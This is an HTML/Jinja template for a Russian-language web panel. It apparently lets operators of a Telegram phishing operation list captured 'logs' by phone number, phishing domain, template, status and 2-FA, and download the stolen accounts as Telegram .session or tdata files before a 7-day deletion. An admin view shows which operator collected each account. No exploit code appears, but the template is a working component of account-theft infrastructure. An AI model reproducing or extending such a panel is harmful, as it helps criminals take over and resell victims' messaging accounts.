{% extends 'base.html' %}



{% block head %}
    <link rel="stylesheet" href="{{ url_for('static', filename='css/panel.css') }}">

{% endblock %}


{% block body %}  
{% include 'header.html' %}




<section class="logs">
<div class="container">
    <h3 class="logs__title title">
        Аккаунты
    </h3>

    <p class="logs__description desc">
        <b>Внимание!</b> Аккаунты хранятся 7 дней, после чего безвозвратно удаляются! Своевременно скачивайте свои аккаунты! <br>
        Скачивание и удаление аккаунтов происходит в 3 шага: выделение, подготовка архива и скачивание. <br>
        Ссылка на скачивание появится на этой странице через некоторое время (подготовка архива обычно занимает 1-2 минуты).
    </p>




    

    <div class="main__table-container">
        <div class="row">
            <button class="btn" id="download_session">Скачать как .session</button>
            <button class="btn" id="download_tdata">Скачать как tdata</button>
            <button class="btn" id="remove_logs">Удалить</button>

        </div>
        
        <div class="radio-switch">
            <label class="radio-switch__label radio-switch__label" id="select_all">
                Выбрать все
            </label>
        
            <label class="radio-switch__label radio-switch__label" id="unselect_all">
                Убрать все
            </label>
        </div>

        {% if not admin %}
        <h3 class="main__table-title">Количество логов: {{ logs | length }}</h3>
        
        <table class="logs-table">
            <thead>
                <tr>
                    <th>Телефон</th>
                    <th>Домен</th>
                    <th>Время</th>
                    <th>Шаблон</th>
                    <th>Статус</th>
                    <th>2-FA</th>
                </tr>
            </thead>
            <tbody>
                
                {% for log in logs %}
                <tr><td class="row"><input type="checkbox" class="log-checkbox">{{ log[0] }}</td><td>{{ log[1] }}</td><td class="datetime">{{ log[2] }}</td><td>{{ log[3] }}</td><td>{{ log[4] }}</td><td>{{ log[5] }}</td>
                </tr>
                {% endfor %}
            </tbody>
        </table>
        {% else %}
        <h3 class="main__table-title">Количество логов: {{ admin_logs | length }}</h3>

        <table class="logs-table">
            <thead>
                <tr>
                    <th>Телефон</th>
                    <th>Логин</th>
                    <th>Домен</th>
                    <th>Время</th>
                    <th>Шаблон</th>
                    <th>Статус</th>
                    <th>2-FA</th>
                </tr>
            </thead>
            <tbody>
                {% for log in admin_logs %}
                <tr><td class="row"><input type="checkbox" class="log-checkbox">{{ log[1] }}</td><td>{{ log[0] }}</td><td>{{ log[2] }}</td><td class="datetime">{{ log[3] }}</td><td>{{ log[4] }}</td><td>{{ log[5] }}</td><td>{{ log[6] }}</td>
                </tr>
                {% endfor %}
            </tbody>
        </table>
        <div class="hidden" id="admin">admin</div>
        {% endif %}

    </div>

</div>    
</section>



{% endblock %}

{% block script %}
<script src="{{ url_for('static', filename='js/panel.js') }}"></script>
{% endblock %}